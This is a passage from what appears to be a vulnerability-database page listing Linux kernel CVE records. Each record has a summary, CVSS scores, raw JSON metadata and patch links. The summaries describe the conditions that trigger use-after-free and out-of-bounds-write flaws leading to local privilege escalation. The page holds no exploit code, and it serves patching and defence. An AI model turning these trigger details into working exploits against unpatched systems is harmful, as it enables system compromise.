If a class with a link-sharing curve (i.e. with the HFSC_FSC flag set) has a parent without a link-sharing curve, then init_vf() will call vttree_insert() on the parent, but vttree_remove() will be skipped in update_vf(). This leaves a dangling pointer that can cause a use-after-free.
We recommend upgrading past commit b3d26c5702c7d6c45456326e56d2ccf3f103e60f.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T07:31:06.625Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b3d26c5702c7d6c45456326e56d2ccf3f103e60f"
},
{
"tags": [
"x_transferred"
],
"url": "https://kernel.dance/b3d26c5702c7d6c45456326e56d2ccf3f103e60f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-4623",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-26T21:52:35.435762Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-27T21:00:32.991Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Kernel",
"repo": "https://git.kernel.org",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.6",
"status": "affected",
"version": "2.6.12",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Budimir Markovic"
}
],
"datePublic": "2023-08-26T01:57:54.000Z",
"descriptions": [
{
"lang": "en",
"value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: sch_hfsc (HFSC qdisc traffic control) component can be exploited to achieve local privilege escalation.\n\nIf a class with a link-sharing curve (i.e. with the HFSC_FSC flag set) has a parent without a link-sharing curve, then init_vf() will call vttree_insert() on the parent, but vttree_remove() will be skipped in update_vf(). This leaves a dangling pointer that can cause a use-after-free.\n\nWe recommend upgrading past commit b3d26c5702c7d6c45456326e56d2ccf3f103e60f."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-11T19:06:55.765Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b3d26c5702c7d6c45456326e56d2ccf3f103e60f"
},
{
"url": "https://kernel.dance/b3d26c5702c7d6c45456326e56d2ccf3f103e60f"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
},
{
"url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Use-after-free in Linux kernel\u0027s net/sched: sch_hfsc (HFSC qdisc traffic control) component",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2023-4623",
"datePublished": "2023-09-06T13:56:57.295Z",
"dateReserved": "2023-08-30T11:58:12.267Z",
"dateUpdated": "2025-02-27T21:00:32.991Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-5717 (GCVE-0-2023-5717)
Vulnerability from cvelistv5
Published
2023-10-25 12:55
Modified
2025-02-13 17:25
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-787 - Out-of-bounds Write
Summary
A heap out-of-bounds write vulnerability in the Linux kernel's Linux Kernel Performance Events (perf) component can be exploited to achieve local privilege escalation.
If perf_read_group() is called while an event's sibling_list is smaller than its child's sibling_list, it can increment or write to memory locations outside of the allocated buffer.
We recommend upgrading past commit 32671e3799ca2e4590773fd0e63aaa4229e50c06.
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T08:07:32.716Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/kernel/events?id=32671e3799ca2e4590773fd0e63aaa4229e50c06"
},
{
"tags": [
"x_transferred"
],
"url": "https://kernel.dance/32671e3799ca2e4590773fd0e63aaa4229e50c06"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Kernel",
"repo": "https://git.kernel.org",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.6",
"status": "affected",
"version": "4.4",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Budimir Markovic"
}
],
"datePublic": "2023-10-19T08:09:42.000Z",
"descriptions": [
{
"lang": "en",
"value": "A heap out-of-bounds write vulnerability in the Linux kernel\u0027s Linux Kernel Performance Events (perf) component can be exploited to achieve local privilege escalation.\n\nIf perf_read_group() is called while an event\u0027s sibling_list is smaller than its child\u0027s sibling_list, it can increment or write to memory locations outside of the allocated buffer.\n\nWe recommend upgrading past commit 32671e3799ca2e4590773fd0e63aaa4229e50c06."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787 Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-11T19:06:46.196Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/kernel/events?id=32671e3799ca2e4590773fd0e63aaa4229e50c06"
},
{
"url": "https://kernel.dance/32671e3799ca2e4590773fd0e63aaa4229e50c06"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Out-of-bounds write in Linux kernel\u0027s Linux Kernel Performance Events (perf) component",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2023-5717",
"datePublished": "2023-10-25T12:55:06.871Z",
"dateReserved": "2023-10-23T10:49:09.250Z",
"dateUpdated": "2025-02-13T17:25:43.494Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-3609 (GCVE-0-2023-3609)
Vulnerability from cvelistv5
Published
2023-07-21 20:47
Modified
2025-03-05 18:48
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A use-after-free vulnerability in the Linux kernel's net/sched: cls_u32 component can be exploited to achieve local privilege escalation.
If tcf_change_indev() fails, u32_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.
We recommend upgrading past commit 04c55383fa5689357bcdd2c8036725a55ed632bc.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T07:01:56.672Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=04c55383fa5689357bcdd2c8036725a55ed632bc"
},
{
"tags": [
"x_transferred"
],
"url": "https://kernel.dance/04c55383fa5689357bcdd2c8036725a55ed632bc"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230818-0005/"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5480"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-3609",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-05T18:36:26.184616Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-05T18:48:12.763Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Kernel",
"repo": "https://git.kernel.org",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.4",
"status": "affected",
"version": "4.14",
"versionType": "custom"
}
]
}
],
"datePublic": "2023-06-09T10:40:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eA use-after-free vulnerability in the Linux kernel\u0027s net/sched: cls_u32 component can be exploited to achieve local privilege escalation.\u003c/p\u003e\u003cp\u003eIf tcf_change_indev() fails, u32_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.\u003c/p\u003e\u003cp\u003eWe recommend upgrading past commit 04c55383fa5689357bcdd2c8036725a55ed632bc.\u003c/p\u003e"
}
],
"value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: cls_u32 component can be exploited to achieve local privilege escalation.\n\nIf tcf_change_indev() fails, u32_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.\n\nWe recommend upgrading past commit 04c55383fa5689357bcdd2c8036725a55ed632bc."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-11T19:06:24.758Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=04c55383fa5689357bcdd2c8036725a55ed632bc"
},
{
"url": "https://kernel.dance/04c55383fa5689357bcdd2c8036725a55ed632bc"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230818-0005/"
},
{
"url": "https://www.debian.org/security/2023/dsa-5480"
},
{
"url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
},
{
"url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Use-after-free in Linux kernel\u0027s net/sched: cls_u32 component",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2023-3609",
"datePublished": "2023-07-21T20:47:12.172Z",
"dateReserved": "2023-07-10T20:52:53.660Z",
"dateUpdated": "2025-03-05T18:48:12.763Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-0480 (GCVE-0-2022-0480)
Vulnerability from cvelistv5
Published
2022-08-29 14:03
Modified
2024-08-02 23:32
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-770 - - Allocation of Resources Without Limits or Throttling.
Summary
A flaw was found in the filelock_init in fs/locks.c function in the Linux kernel. This issue can lead to host memory exhaustion due to memcg not limiting the number of Portable Operating System Interface (POSIX) file locks.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:32:46.033Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/kata-containers/kata-containers/issues/3373"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lore.kernel.org/linux-mm/20210902215519.AWcuVc3li%25akpm%40linux-foundation.org/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2049700"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0f12156dff2862ac54235fc72703f18770769042"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2022-0480"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://ubuntu.com/security/CVE-2022-0480"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "kernel",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "Not Known"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the filelock_init in fs/locks.c function in the Linux kernel. This issue can lead to host memory exhaustion due to memcg not limiting the number of Portable Operating System Interface (POSIX) file locks."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770 - Allocation of Resources Without Limits or Throttling.",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-08-29T14:03:03",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kata-containers/kata-containers/issues/3373"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lore.kernel.org/linux-mm/20210902215519.AWcuVc3li%25akpm%40linux-foundation.org/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2049700"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0f12156dff2862ac54235fc72703f18770769042"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://access.redhat.com/security/cve/CVE-2022-0480"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://ubuntu.com/security/CVE-2022-0480"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2022-0480",
"datePublished": "2022-08-29T14:03:04",
"dateReserved": "2022-02-02T00:00:00",
"dateUpdated": "2024-08-02T23:32:46.033Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-3390 (GCVE-0-2023-3390)
Vulnerability from cvelistv5
Published
2023-06-28 20:02
Modified
2025-02-13 16:55
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A use-after-free vulnerability was found in the Linux kernel's netfilter subsystem in net/netfilter/nf_tables_api.c.
Mishandled error handling with NFT_MSG_NEWRULE makes it possible to use a dangling pointer in the same transaction causing a use-after-free vulnerability. This flaw allows a local attacker with user access to cause a privilege escalation issue.
We recommend upgrading past commit 1240eb93f0616b21c675416516ff3d74798fdc97.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux Kernel |
Version: 3.16 < 6.4 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T06:55:03.302Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=1240eb93f0616b21c675416516ff3d74798fdc97"
},
{
"tags": [
"x_transferred"
],
"url": "https://kernel.dance/1240eb93f0616b21c675416516ff3d74798fdc97"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5448"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5461"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00001.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230818-0004/"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Linux Kernel",
"repo": "https://git.kernel.org",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.4",
"status": "affected",
"version": "3.16",
"versionType": "custom"
}
]
}
],
"datePublic": "2023-06-08T19:49:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eA use-after-free vulnerability was found in the Linux kernel\u0027s netfilter subsystem in net/netfilter/nf_tables_api.c.\u003cbr\u003e\u003cbr\u003eMishandled error handling with NFT_MSG_NEWRULE makes it possible to use a dangling pointer in the same transaction causing a use-after-free vulnerability. This flaw allows a local attacker with user access to cause a privilege escalation issue.\u003cbr\u003e\u003cbr\u003e\u003c/span\u003eWe recommend upgrading past commit\u0026nbsp;1240eb93f0616b21c675416516ff3d74798fdc97."
}
],
"value": "A use-after-free vulnerability was found in the Linux kernel\u0027s netfilter subsystem in net/netfilter/nf_tables_api.c.\n\nMishandled error handling with NFT_MSG_NEWRULE makes it possible to use a dangling pointer in the same transaction causing a use-after-free vulnerability. This flaw allows a local attacker with user access to cause a privilege escalation issue.\n\nWe recommend upgrading past commit\u00a01240eb93f0616b21c675416516ff3d74798fdc97."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-11T19:07:12.424Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=1240eb93f0616b21c675416516ff3d74798fdc97"
},
{
"url": "https://kernel.dance/1240eb93f0616b21c675416516ff3d74798fdc97"
},
{
"url": "https://www.debian.org/security/2023/dsa-5448"
},
{
"url": "https://www.debian.org/security/2023/dsa-5461"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00001.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230818-0004/"
},
{
"url": "http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Use-after-free in Linux kernel\u0027s netfilter subsystem",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2023-3390",
"datePublished": "2023-06-28T20:02:07.389Z",
"dateReserved": "2023-06-23T13:45:16.519Z",
"dateUpdated": "2025-02-13T16:55:10.098Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-41858 (GCVE-0-2022-41858)
Vulnerability from cvelistv5
Published
2023-01-17 00:00
Modified
2025-04-07 16:46
Severity ?
VLAI Severity ?
EPSS score ?
CWE
Summary
A flaw was found in the Linux kernel. A NULL pointer dereference may occur while a slip driver is in progress to detach in sl_tx_timeout in drivers/net/slip/slip.c. This issue could allow an attacker to crash the system or leak internal kernel information.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| n/a | Linux kernel |
Version: unknown |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T12:56:38.264Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://github.com/torvalds/linux/commit/ec4eb8a86ade4d22633e1da2a7d85a846b7d1798"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230223-0006/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-41858",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-07T16:46:04.627051Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-07T16:46:38.678Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Linux kernel",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "unknown"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the Linux kernel. A NULL pointer dereference may occur while a slip driver is in progress to detach in sl_tx_timeout in drivers/net/slip/slip.c. This issue could allow an attacker to crash the system or leak internal kernel information."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-02-23T00:00:00.000Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"url": "https://github.com/torvalds/linux/commit/ec4eb8a86ade4d22633e1da2a7d85a846b7d1798"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230223-0006/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2022-41858",
"datePublished": "2023-01-17T00:00:00.000Z",
"dateReserved": "2022-09-30T00:00:00.000Z",
"dateUpdated": "2025-04-07T16:46:38.678Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-7192 (GCVE-0-2023-7192)
Vulnerability from cvelistv5
Published
2024-01-02 19:02
Modified
2025-10-10 00:00
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-401 - Missing Release of Memory after Effective Lifetime
Summary
A memory leak problem was found in ctnetlink_create_conntrack in net/netfilter/nf_conntrack_netlink.c in the Linux Kernel. This issue may allow a local attacker with CAP_NET_ADMIN privileges to cause a denial of service (DoS) attack due to a refcount overflow.
References
| URL | Tags | ||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux 8.2 Advanced Update Support |
Unaffected: 0:4.18.0-193.133.1.el8_2 < * cpe:/o:redhat:rhel_tus:8.2::baseos cpe:/o:redhat:rhel_e4s:8.2::baseos cpe:/o:redhat:rhel_aus:8.2::baseos |
